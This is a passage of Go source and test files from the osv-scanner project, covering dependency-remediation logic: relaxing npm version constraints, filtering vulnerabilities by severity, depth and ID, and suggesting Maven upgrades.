[]string{"1.2.3", "1.2.4", "1.3.0", "1.3.1", "2.0.0"}, from: "~1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Minor}, want: result{ version: "^1.3.1", ok: true, }, }, { name: "minor-to-next-major", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^2.4.5", ok: true, }, }, { name: "skip-missing-major", versions: []string{"1.0.0", "3.0.0", "4.0.0"}, from: "^1.0.0", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^3.0.0", ok: true, }, }, { name: "no-more-versions", versions: []string{"1.2.3", "1.3.4", "1.4.5"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^1.2.3", ok: false, }, }, { name: "avoid-prerelease-patch", versions: []string{"1.2.3", "1.2.4", "1.2.5-alpha"}, from: "1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Minor}, want: result{ version: "~1.2.4", ok: true, }, }, { name: "avoid-prerelease-minor", versions: []string{"1.2.3", "1.3.4", "1.4.5-alpha"}, from: "~1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^1.3.4", ok: true, }, }, { name: "skip-prerelease", versions: []string{"1.2.3", "2.0.0-alpha", "2.0.0", "3.0.0"}, from: "^1.0.0", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^2.0.0", ok: true, }, }, { name: "choose-final-prerelease", versions: []string{"1.2.3", "2.0.0-alpha.0", "2.0.0-alpha.1", "2.0.0-beta"}, from: "^1.0.0", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^2.0.0-beta", ok: true, }, }, { name: "from-prerelease", versions: []string{"1.0.0-pre", "1.2.3", "2.0.0-pre", "2.3.4"}, from: "^1.0.0-pre", upgradeConfig: upgrade.Config{"": upgrade.Major}, want: result{ version: "^2.3.4", ok: true, }, }, { name: "disallow-major", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"": upgrade.Minor}, want: result{ version: 
"^1.2.3", ok: false, }, }, { name: "disallow-major-pkg-only", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"disallow-major-pkg-only": upgrade.Minor, "": upgrade.None}, want: result{ version: "^1.2.3", ok: false, }, }, { name: "disallow-pkg", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "^1.2.3", upgradeConfig: upgrade.Config{"disallow-pkg": upgrade.None}, want: result{ version: "^1.2.3", ok: false, }, }, { name: "disallow-minor", versions: []string{"1.2.3", "1.3.4", "2.3.4", "2.4.5", "3.0.0"}, from: "~1.2.3", upgradeConfig: upgrade.Config{"disallow-minor": upgrade.Patch}, want: result{ version: "~1.2.3", ok: false, }, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() cl := resolve.NewLocalClient() pk := resolve.PackageKey{ Name: tt.name, System: resolve.NPM, } for _, v := range tt.versions { cl.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: pk, Version: v, VersionType: resolve.Concrete, }, }, nil) } relaxer := relax.NpmRelaxer{} got, ok := relaxer.Relax(t.Context(), cl, resolve.RequirementVersion{ VersionKey: resolve.VersionKey{ PackageKey: pk, VersionType: resolve.Requirement, Version: tt.from, }}, tt.upgradeConfig) if got.Version != tt.want.version || ok != tt.want.ok { t.Errorf("Relax() = (%s, %v), want (%s, %v)", got.Version, ok, tt.want.version, tt.want.ok) } }) } } ================================================ FILE: internal/remediation/relax/relax.go ================================================ // Package relax provides functionality for relaxing version constraints for guided remediation. package relax import ( "context" "errors" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) // A RequirementRelaxer provides an ecosystem-specific method for 'relaxing' the // specified versions of dependencies for vulnerability remediation. 
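// Relaxing involves incrementally widening and bumping the version specifiers
// of the requirement to allow more recent versions to be selected during
// dependency resolution.
// It has access to the available versions of a package via a resolve client.
//
// e.g. in a semver-like ecosystem, relaxation could follow the sequence:
// 1.2.3 -> 1.2.* -> 1.*.* -> 2.*.* -> 3.*.* -> ...
type RequirementRelaxer interface {
	// Relax attempts to relax import requirement.
	// Returns the newly relaxed import and true if it was successful.
	// If unsuccessful, it returns the original import and false.
	Relax(ctx context.Context, cl resolve.Client, req resolve.RequirementVersion, config upgrade.Config) (resolve.RequirementVersion, bool)
}

// GetRelaxer returns the RequirementRelaxer for the given ecosystem, or an
// error when the ecosystem has no relaxer (only npm is handled here).
func GetRelaxer(ecosystem resolve.System) (RequirementRelaxer, error) {
	// TODO: is using ecosystem fine, or should this be per manifest?
	switch ecosystem {
	case resolve.NPM:
		return NpmRelaxer{}, nil
	default:
		return nil, errors.New("unsupported ecosystem")
	}
}

================================================
FILE: internal/remediation/relax.go
================================================
package remediation

import (
	"context"
	"errors"
	"slices"

	"deps.dev/util/resolve"
	"github.com/google/osv-scanner/v2/internal/remediation/relax"
	"github.com/google/osv-scanner/v2/internal/remediation/upgrade"
	"github.com/google/osv-scanner/v2/internal/resolution"
	"github.com/google/osv-scanner/v2/internal/resolution/client"
)

// ComputeRelaxPatches attempts to resolve each vulnerability found in result independently, returning the list of unique possible patches
//
// One goroutine is started per vulnerability. Each reports over an unbuffered
// channel, so every started goroutine must have its result received, or it
// stays blocked on the send. A vulnerability that cannot be fixed by relaxing
// is skipped; any other error aborts the whole computation and is returned.
func ComputeRelaxPatches(ctx context.Context, cl client.ResolutionClient, result *resolution.Result, opts Options) ([]resolution.Difference, error) {
	// Filter the original result just in case it hasn't been already
	result.FilterVulns(opts.MatchVuln)

	// Do the resolutions concurrently
	type relaxResult struct {
		vulnIDs []string
		result  *resolution.Result
		err     error
	}
	ch := make(chan relaxResult)
	doRelax := func(vulnIDs []string) {
		res, err := tryRelaxRemediate(ctx, cl, result, vulnIDs, opts)
		if err == nil {
			res.FilterVulns(opts.MatchVuln)
		}
		ch <- relaxResult{
			vulnIDs: vulnIDs,
			result:  res,
			err:     err,
		}
	}

	// toProcess counts the goroutines whose result has not been received yet.
	toProcess := 0
	for _, vuln := range result.Vulns {
		// TODO: limit the number of goroutines
		go doRelax([]string{vuln.OSV.GetId()})
		toProcess++
	}

	var allResults []resolution.Difference
	for toProcess > 0 {
		res := <-ch
		toProcess--
		if errors.Is(res.err, errRelaxRemediateImpossible) {
			// failed because it cannot be resolved - do not add it to list
			continue
		}

		if res.err != nil {
			// failed for some other reason - abort
			// Receive the results of the goroutines still in flight in the
			// background. Without this, each of them would block forever on the
			// unbuffered send above and leak once we return.
			// TODO: stop goroutines (they still run to completion)
			go func(pending int) {
				for ; pending > 0; pending-- {
					<-ch
				}
			}(toProcess)

			return nil, res.err
		}

		diff := result.CalculateDiff(res.result)
		allResults = append(allResults, diff)

		// If this patch adds a new vuln, see if we can fix it also
		// TODO: If there's more than 1 added vuln, this can possibly cause every permutation of those vulns to be computed
		for _, added := range diff.AddedVulns {
			go doRelax(append(slices.Clone(res.vulnIDs), added.OSV.GetId()))
			toProcess++
		}
	}

	// Sort and remove duplicate patches
	slices.SortFunc(allResults, func(a, b resolution.Difference) int { return a.Compare(b) })
	allResults = slices.CompactFunc(allResults, func(a, b resolution.Difference) bool { return a.Compare(b) == 0 })

	return allResults, nil
}

var errRelaxRemediateImpossible = errors.New("cannot fix vulns by relaxing")

func tryRelaxRemediate(
	ctx context.Context,
	cl client.ResolutionClient,
	orig *resolution.Result,
	vulnIDs []string,
	opts Options,
) (*resolution.Result, error) {
	relaxer, err := relax.GetRelaxer(orig.Manifest.System())
	if err != nil {
		return nil, err
	}

	newRes := orig
	toRelax := reqsToRelax(ctx, cl, newRes, vulnIDs, opts)
	for len(toRelax) > 0 {
		// Try relaxing all necessary requirements
		manif := newRes.Manifest.Clone()
		for _, idx := range toRelax {
			rv := manif.Requirements[idx]
			// If we'd need to relax a package we want to avoid changing, we cannot fix the vuln
			if opts.UpgradeConfig.Get(rv.Name) == upgrade.None {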
return nil, errRelaxRemediateImpossible } newVer, ok := relaxer.Relax(ctx, cl, rv, opts.UpgradeConfig) if !ok { return nil, errRelaxRemediateImpossible } manif.Requirements[idx] = newVer } // re-resolve relaxed manifest newRes, err = resolution.Resolve(ctx, cl, manif, opts.ResolveOpts) if err != nil { return nil, err } toRelax = reqsToRelax(ctx, cl, newRes, vulnIDs, opts) } return newRes, nil } func reqsToRelax(ctx context.Context, cl resolve.Client, res *resolution.Result, vulnIDs []string, opts Options) []int { toRelax := make(map[resolve.VersionKey]string) for _, v := range res.Vulns { // Don't do a full opts.MatchVuln() since we know we don't need to check every condition if !slices.Contains(vulnIDs, v.OSV.GetId()) || (!opts.DevDeps && v.DevOnly) { continue } // Only relax dependencies if their distance is less than MaxDepth for _, sg := range v.Subgraphs { constr := sg.ConstrainingSubgraph(ctx, cl, v.OSV) for _, edge := range constr.Nodes[0].Children { gNode := constr.Nodes[edge.To] if opts.MaxDepth <= 0 || gNode.Distance+1 <= opts.MaxDepth { toRelax[gNode.Version] = edge.Requirement } } } } // Find the index into the Manifest.Requirements of each that needs to be relaxed reqIdxs := make([]int, 0, len(toRelax)) for vk, req := range toRelax { idx := slices.IndexFunc(res.Manifest.Requirements, func(rv resolve.RequirementVersion) bool { return rv.PackageKey == vk.PackageKey && rv.Version == req }) reqIdxs = append(reqIdxs, idx) } return reqIdxs } ================================================ FILE: internal/remediation/relax_test.go ================================================ package remediation_test import ( "testing" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" ) func TestComputeRelaxPatches(t *testing.T) { t.Parallel() basicOpts := remediation.Options{ DevDeps: true, MaxDepth: -1, UpgradeConfig: upgrade.NewConfig(), } tests := []struct { name string universePath string vulnPath 
string manifestPath string opts remediation.Options }{ { name: "npm-santatracker", universePath: "./testdata/santatracker/universe.yaml", vulnPath: "./testdata/santatracker/vulns.json", manifestPath: "./testdata/santatracker/package.json", opts: basicOpts, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() res, cl := parseRemediationFixture(t, tt.universePath, tt.vulnPath, tt.manifestPath, tt.opts.ResolveOpts) res.FilterVulns(tt.opts.MatchVuln) p, err := remediation.ComputeRelaxPatches(t.Context(), cl, res, tt.opts) if err != nil { t.Fatalf("Failed to compute relaxation patches: %v", err) } checkRemediationResults(t, p) }) } } ================================================ FILE: internal/remediation/remediation.go ================================================ package remediation import ( "math" "slices" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/google/osv-scanner/v2/internal/resolution/lockfile" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/utility/severity" ) // TODO: Supported strategies should be part of the manifest/lockfile ReadWriter directly func SupportsRelax(m manifest.ReadWriter) bool { switch m.(type) { case manifest.NpmReadWriter: return true default: return false } } func SupportsOverride(m manifest.ReadWriter) bool { switch m.(type) { case manifest.MavenReadWriter: return true default: return false } } func SupportsInPlace(l lockfile.ReadWriter) bool { switch l.(type) { case lockfile.NpmReadWriter: return true default: return false } } type Options struct { resolution.ResolveOpts IgnoreVulns []string // Vulnerability IDs to ignore ExplicitVulns []string // If set, only consider these vulnerability IDs & ignore all others DevDeps bool // Whether to consider vulnerabilities in dev dependencies MinSeverity float64 // Minimum vulnerability CVSS score to consider MaxDepth 
int // Maximum depth of dependency to consider vulnerabilities for (e.g. 1 for direct only) UpgradeConfig upgrade.Config // Allowed upgrade levels per package. } func (opts Options) MatchVuln(v resolution.Vulnerability) bool { if opts.matchID(v, opts.IgnoreVulns) { return false } if len(opts.ExplicitVulns) > 0 && !opts.matchID(v, opts.ExplicitVulns) { return false } if !opts.DevDeps && v.DevOnly { return false } return opts.matchSeverity(v) && opts.matchDepth(v) } func (opts Options) matchID(v resolution.Vulnerability, ids []string) bool { if slices.Contains(ids, v.OSV.GetId()) { return true } for _, id := range v.OSV.GetAliases() { if slices.Contains(ids, id) { return true } } return false } func (opts Options) matchSeverity(v resolution.Vulnerability) bool { maxScore := -1.0 // TODO: also check OSV.Affected[].Severity for _, sev := range v.OSV.GetSeverity() { if score, _, _ := severity.CalculateScore(sev); score > maxScore { maxScore = score } } // CVSS scores are meant to only be to 1 decimal place // and we want to avoid something being falsely rejected/included due to floating point precision. // Multiply and round to only consider relevant parts of the score. 
return math.Round(10*maxScore) >= math.Round(10*opts.MinSeverity) || maxScore < 0 // Always include vulns with unknown severities } func (opts Options) matchDepth(v resolution.Vulnerability) bool { if opts.MaxDepth <= 0 { return true } for _, sg := range v.Subgraphs { if sg.Nodes[0].Distance <= opts.MaxDepth { return true } } return false } ================================================ FILE: internal/remediation/remediation_test.go ================================================ package remediation_test import ( "testing" "deps.dev/util/resolve" "github.com/google/osv-scanner/v2/internal/remediation" "github.com/google/osv-scanner/v2/internal/resolution" "github.com/ossf/osv-schema/bindings/go/osvschema" ) func TestMatchVuln(t *testing.T) { t.Parallel() var ( // ID: VULN-001, Dev: false, Severity: 6.6, Depth: 3, Aliases: CVE-111, OSV-2 vuln1 = resolution.Vulnerability{ OSV: &osvschema.Vulnerability{ Id: "VULN-001", Severity: []*osvschema.Severity{ {Type: osvschema.Severity_CVSS_V3, Score: "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H"}, // 6.6 {Type: osvschema.Severity_CVSS_V2, Score: "AV:L/AC:L/Au:S/C:P/I:P/A:C"}, // 5.7 }, Aliases: []string{"CVE-111", "OSV-2"}, }, DevOnly: false, Subgraphs: []*resolution.DependencySubgraph{{ Dependency: 3, Nodes: map[resolve.NodeID]resolution.GraphNode{ 3: { Distance: 0, Parents: []resolve.Edge{{From: 2, To: 3}}, Children: []resolve.Edge{}, }, 2: { Distance: 1, Parents: []resolve.Edge{{From: 1, To: 2}}, Children: []resolve.Edge{{From: 2, To: 3}}, }, 1: { Distance: 2, Parents: []resolve.Edge{{From: 0, To: 1}}, Children: []resolve.Edge{{From: 1, To: 2}}, }, 0: { Distance: 3, Parents: []resolve.Edge{}, Children: []resolve.Edge{{From: 0, To: 1}}, }, }, }}, } // ID: VULN-002, Dev: true, Severity: N/A, Depth: 2 vuln2 = resolution.Vulnerability{ OSV: &osvschema.Vulnerability{ Id: "VULN-002", // No severity }, DevOnly: true, Subgraphs: []*resolution.DependencySubgraph{{ Dependency: 3, Nodes: map[resolve.NodeID]resolution.GraphNode{ 
3: { Distance: 0, Parents: []resolve.Edge{{From: 2, To: 3}, {From: 1, To: 3}}, Children: []resolve.Edge{}, }, 2: { Distance: 1, Parents: []resolve.Edge{{From: 1, To: 2}}, Children: []resolve.Edge{{From: 2, To: 3}}, }, 1: { Distance: 1, Parents: []resolve.Edge{{From: 0, To: 1}}, Children: []resolve.Edge{{From: 1, To: 2}, {From: 1, To: 3}}, }, 0: { Distance: 2, Parents: []resolve.Edge{}, Children: []resolve.Edge{{From: 0, To: 1}}, }, }, }}, } ) tests := []struct { name string vuln resolution.Vulnerability opt remediation.Options want bool }{ { name: "basic_match", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, }, want: true, }, { name: "accept_depth", vuln: vuln2, opt: remediation.Options{ DevDeps: true, MaxDepth: 2, }, want: true, }, { name: "reject_depth", vuln: vuln2, opt: remediation.Options{ DevDeps: true, MaxDepth: 1, }, want: false, }, { name: "accept_severity", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, MinSeverity: 6.6, }, want: true, }, { name: "reject_severity", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, MinSeverity: 6.7, }, want: false, }, { name: "accept_unknown_severity", vuln: vuln2, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, MinSeverity: 10.0, }, want: true, }, { name: "accept_non-dev", vuln: vuln1, opt: remediation.Options{ DevDeps: false, MaxDepth: -1, }, want: true, }, { name: "reject_dev", vuln: vuln2, opt: remediation.Options{ DevDeps: false, MaxDepth: -1, }, want: false, }, { name: "reject_ID_excluded", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, IgnoreVulns: []string{"VULN-001"}, }, want: false, }, { name: "reject_ID_not_in_explicit", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, ExplicitVulns: []string{"VULN-999"}, }, want: false, }, { name: "reject_ID_in_explicit,_but_not_matching_other_fields", vuln: vuln2, opt: remediation.Options{ DevDeps: false, MaxDepth: 1, ExplicitVulns: []string{"VULN-002"}, }, want: false, 
}, { name: "accept_matching_multiple_1", vuln: vuln1, opt: remediation.Options{ DevDeps: false, MaxDepth: 3, MinSeverity: 5.0, IgnoreVulns: []string{"VULN-999"}, }, want: true, }, { name: "accept_matching_multiple_2", vuln: vuln2, opt: remediation.Options{ DevDeps: true, MaxDepth: 2, MinSeverity: 8.8, ExplicitVulns: []string{"VULN-002"}, }, want: true, }, { name: "accept_explicit_ID_in_alias", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, ExplicitVulns: []string{"CVE-111"}, }, want: true, }, { name: "reject_excluded_ID_in_alias", vuln: vuln1, opt: remediation.Options{ DevDeps: true, MaxDepth: -1, IgnoreVulns: []string{"OSV-2"}, }, want: false, }, } for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { t.Parallel() if got := tt.opt.MatchVuln(tt.vuln); got != tt.want { t.Errorf("MatchVuln() = %v, want %v", got, tt.want) } }) } } ================================================ FILE: internal/remediation/suggest/maven.go ================================================ package suggest import ( "context" "errors" "fmt" "slices" "strings" "deps.dev/util/resolve" "deps.dev/util/semver" "github.com/google/osv-scanner/v2/internal/cmdlogger" "github.com/google/osv-scanner/v2/internal/remediation/upgrade" "github.com/google/osv-scanner/v2/internal/resolution/manifest" "github.com/google/osv-scanner/v2/internal/utility/maven" ) type MavenSuggester struct{} // Suggest returns the ManifestPatch to update Maven dependencies to a newer // version based on the options. // ManifestPatch also includes the property patches to update. func (ms *MavenSuggester) Suggest(ctx context.Context, cl resolve.Client, mf manifest.Manifest, opts Options) (manifest.Patch, error) { specific, ok := mf.EcosystemSpecific.(manifest.MavenManifestSpecific) if !ok { return manifest.Patch{}, errors.New("invalid MavenManifestSpecific data") } var changedDeps []manifest.DependencyPatch for _, req := range append(mf.Requirements, specific.RequirementsForUpdates...) 
{ if opts.UpgradeConfig.Get(req.Name) == upgrade.None { continue } if opts.IgnoreDev && slices.Contains(mf.Groups[manifest.MakeRequirementKey(req)], "test") { // Skip the update if the dependency is of development group // and updates on development dependencies are not desired continue } if strings.Contains(req.Name, "${") && strings.Contains(req.Version, "${") { // If there are unresolved properties, we should skip this version. continue } latest, err := suggestMavenVersion(ctx, cl, req, opts.UpgradeConfig.Get(req.Name)) if err != nil { return manifest.Patch{}, fmt.Errorf("suggesting latest version of %s: %w", req.Version, err) } if latest.Version == req.Version { // No need to update continue } changedDeps = append(changedDeps, manifest.DependencyPatch{ Pkg: req.PackageKey, Type: req.Type, OrigRequire: req.Version, NewRequire: latest.Version, }) } return manifest.Patch{ Deps: changedDeps, Manifest: &mf, }, nil } // suggestMavenVersion returns the latest version based on the given Maven requirement version. // If there is no newer version available, req will be returned. // For a version range requirement, // - the greatest version matching the constraint is assumed when deciding whether the // update is a major update or not. // - if the latest version does not satisfy the constraint, this version is returned; // otherwise, the original version range requirement is returned. 
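func suggestMavenVersion(ctx context.Context, cl resolve.Client, req resolve.RequirementVersion, level upgrade.Level) (resolve.RequirementVersion, error) {
	versions, err := cl.Versions(ctx, req.PackageKey)
	if err != nil {
		return resolve.RequirementVersion{}, fmt.Errorf("requesting versions of Maven package %s: %w", req.Name, err)
	}

	// The version list is whatever the resolve client returns for the package.
	// Entries that do not parse as Maven versions are logged and skipped
	// rather than failing the whole suggestion.
	semvers := make([]*semver.Version, 0, len(versions))
	for _, ver := range versions {
		parsed, err := semver.Maven.Parse(ver.Version)
		if err != nil {
			// Log the raw version string; parsed is not a usable value when
			// Parse reports an error.
			cmdlogger.Warnf("parsing Maven version %s: %v", ver.Version, err)
			continue
		}
		semvers = append(semvers, parsed)
	}

	constraint, err := semver.Maven.ParseConstraint(req.Version)
	if err != nil {
		return resolve.RequirementVersion{}, fmt.Errorf("parsing Maven constraint %s: %w", req.Version, err)
	}

	var current *semver.Version
	if constraint.IsSimple() {
		// Constraint is a simple version string, so can be parsed to a single version.
		current, err = semver.Maven.Parse(req.Version)
		if err != nil {
			return resolve.RequirementVersion{}, fmt.Errorf("parsing Maven version %s: %w", req.Version, err)
		}
	} else {
		// Guess the latest version satisfying the constraint is being used
		// NOTE(review): current is nil on the first comparison, and stays nil
		// if no known version matches the constraint. This relies on Compare
		// (and Difference below) tolerating a nil *semver.Version - confirm.
		for _, v := range semvers {
			if constraint.MatchVersion(v) && current.Compare(v) < 0 {
				current = v
			}
		}
	}

	var newReq *semver.Version
	for _, v := range semvers {
		if maven.CompareVersions(req.VersionKey, v, newReq) < 0 {
			// Skip versions smaller than the current requirement
			continue
		}
		if _, diff := v.Difference(current); !level.Allows(diff) {
			continue
		}
		newReq = v
	}

	if newReq == nil {
		// No candidate survived: the client returned no parseable versions,
		// or none is allowed at this upgrade level. Return the requirement
		// unchanged instead of dereferencing a nil version, so an empty or
		// malformed version list cannot produce a bogus requirement string.
		return req, nil
	}

	if constraint.IsSimple() || !constraint.MatchVersion(newReq) {
		// For version range requirement, update the requirement if the
		// new requirement does not satisfy the constraint.
		req.Version = newReq.String()
	}

	return req, nil
}

================================================
FILE: internal/remediation/suggest/maven_test.go
================================================
package suggest

import (
	"path/filepath"
	"reflect"
	"sort"
	"testing"

	"deps.dev/util/resolve"
	"deps.dev/util/resolve/dep"
	"github.com/google/osv-scanner/v2/internal/remediation/upgrade"
	"github.com/google/osv-scanner/v2/internal/resolution/manifest"
)

var (
	depMgmt           = depTypeWithOrigin("management")
	depParent         = depTypeWithOrigin("parent")
	depPlugin         = depTypeWithOrigin("plugin@org.plugin:plugin")
	depProfileOne     = depTypeWithOrigin("profile@profile-one")
	depProfileTwoMgmt = depTypeWithOrigin("profile@profile-two@management")
)

// depTypeWithOrigin returns a dep.Type carrying the given value as its
// dep.MavenDependencyOrigin attribute.
func depTypeWithOrigin(origin string) dep.Type {
	var result dep.Type
	result.AddAttr(dep.MavenDependencyOrigin, origin)

	return result
}

// mavenReqKey builds the manifest.RequirementKey of a Maven requirement with
// the given name; artifactType and classifier are added as attributes only
// when non-empty.
func mavenReqKey(t *testing.T, name, artifactType, classifier string) manifest.RequirementKey {
	t.Helper()
	var typ dep.Type
	if artifactType != "" {
		typ.AddAttr(dep.MavenArtifactType, artifactType)
	}
	if classifier != "" {
		typ.AddAttr(dep.MavenClassifier, classifier)
	}

	return manifest.MakeRequirementKey(resolve.RequirementVersion{
		VersionKey: resolve.VersionKey{
			PackageKey: resolve.PackageKey{
				Name:   name,
				System: resolve.Maven,
			},
		},
		Type: typ,
	})
}

func TestMavenSuggester_Suggest(t *testing.T) { t.Parallel() ctx := t.Context() client := resolve.NewLocalClient() addVersions := func(sys resolve.System, name string, versions []string) { for _, version := range versions { client.AddVersion(resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: sys, Name: name, }, VersionType: resolve.Concrete, Version: version, }}, nil) } } addVersions(resolve.Maven, "com.mycompany.app:parent-pom", []string{"1.0.0"}) addVersions(resolve.Maven, "junit:junit", []string{"4.11", "4.12", "4.13", "4.13.2"}) addVersions(resolve.Maven, "org.example:abc", []string{"1.0.0", "1.0.1", "1.0.2"}) addVersions(resolve.Maven,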
"org.example:no-updates", []string{"9.9.9", "10.0.0"}) addVersions(resolve.Maven, "org.example:property", []string{"1.0.0", "1.0.1"}) addVersions(resolve.Maven, "org.example:same-property", []string{"1.0.0", "1.0.1"}) addVersions(resolve.Maven, "org.example:another-property", []string{"1.0.0", "1.1.0"}) addVersions(resolve.Maven, "org.example:property-no-update", []string{"1.9.0", "2.0.0"}) addVersions(resolve.Maven, "org.example:xyz", []string{"2.0.0", "2.0.1"}) addVersions(resolve.Maven, "org.profile:abc", []string{"1.2.3", "1.2.4"}) addVersions(resolve.Maven, "org.profile:def", []string{"2.3.4", "2.3.5"}) addVersions(resolve.Maven, "org.import:xyz", []string{"6.6.6", "6.7.0", "7.0.0"}) addVersions(resolve.Maven, "org.dep:plugin-dep", []string{"2.3.1", "2.3.2", "2.3.3", "2.3.4"}) suggester, err := GetSuggester(resolve.Maven) if err != nil { t.Fatalf("failed to get Maven suggester: %v", err) } depProfileTwoMgmt.AddAttr(dep.MavenArtifactType, "pom") depProfileTwoMgmt.AddAttr(dep.Scope, "import") mf := manifest.Manifest{ FilePath: filepath.Join("testdata", "pom.xml"), Root: resolve.Version{ VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "com.mycompany.app:my-app", }, VersionType: resolve.Concrete, Version: "1.0.0", }, }, Requirements: []resolve.RequirementVersion{ { // Test dependencies are not updated. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "junit:junit", }, VersionType: resolve.Requirement, Version: "4.12", }, Type: dep.NewType(dep.Test), }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:abc", }, VersionType: resolve.Requirement, Version: "1.0.1", }, }, { // A package is specified to disallow updates. 
VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:no-updates", }, VersionType: resolve.Requirement, Version: "9.9.9", }, }, { // The universal property should be updated. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property", }, VersionType: resolve.Requirement, Version: "1.0.0", }, }, { // Property cannot be updated, so update the dependency directly. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property-no-update", }, VersionType: resolve.Requirement, Version: "1.9", }, }, { // The property is updated to the same value. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:same-property", }, VersionType: resolve.Requirement, Version: "1.0.0", }, }, { // Property needs to be updated to a different value, // so update dependency directly. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:another-property", }, VersionType: resolve.Requirement, Version: "1.0.0", }, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:xyz", }, VersionType: resolve.Requirement, Version: "2.0.0", }, Type: depMgmt, }, }, Groups: map[manifest.RequirementKey][]string{ mavenReqKey(t, "junit:junit", "", ""): {"test"}, mavenReqKey(t, "org.import:xyz", "", ""): {"import"}, }, EcosystemSpecific: manifest.MavenManifestSpecific{ RequirementsForUpdates: []resolve.RequirementVersion{ { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "com.mycompany.app:parent-pom", }, VersionType: resolve.Requirement, Version: "1.0.0", }, Type: depParent, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:abc", }, VersionType: resolve.Requirement, Version: "1.2.3", }, Type: 
depProfileOne, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.profile:def", }, VersionType: resolve.Requirement, Version: "2.3.4", }, Type: depProfileOne, }, { // A package is specified to ignore major updates. VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.import:xyz", }, VersionType: resolve.Requirement, Version: "6.6.6", }, Type: depProfileTwoMgmt, }, { VersionKey: resolve.VersionKey{ PackageKey: resolve.PackageKey{ System: resolve.Maven, Name: "org.dep:plugin-dep", }, VersionType: resolve.Requirement, Version: "2.3.3", }, Type: depPlugin, }, }, }, } got, err := suggester.Suggest(ctx, client, mf, Options{ IgnoreDev: true, // Do no update test dependencies. UpgradeConfig: upgrade.Config{ "org.example:no-updates": upgrade.None, "org.import:xyz": upgrade.Minor, }, }) if err != nil { t.Fatalf("failed to suggest ManifestPatch: %v", err) } want := manifest.Patch{ Deps: []manifest.DependencyPatch{ { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.dep:plugin-dep", }, Type: depPlugin, OrigRequire: "2.3.3", NewRequire: "2.3.4", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:abc", }, OrigRequire: "1.0.1", NewRequire: "1.0.2", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:another-property", }, OrigRequire: "1.0.0", NewRequire: "1.1.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property", }, OrigRequire: "1.0.0", NewRequire: "1.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:property-no-update", }, OrigRequire: "1.9", NewRequire: "2.0.0", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:same-property", }, OrigRequire: "1.0.0", NewRequire: "1.0.1", }, { Pkg: resolve.PackageKey{ System: resolve.Maven, Name: "org.example:xyz", }, Type: depMgmt, OrigRequire: "2.0.0", NewRequire: "2.0.1", }, { Pkg: resolve.PackageKey{ System: 
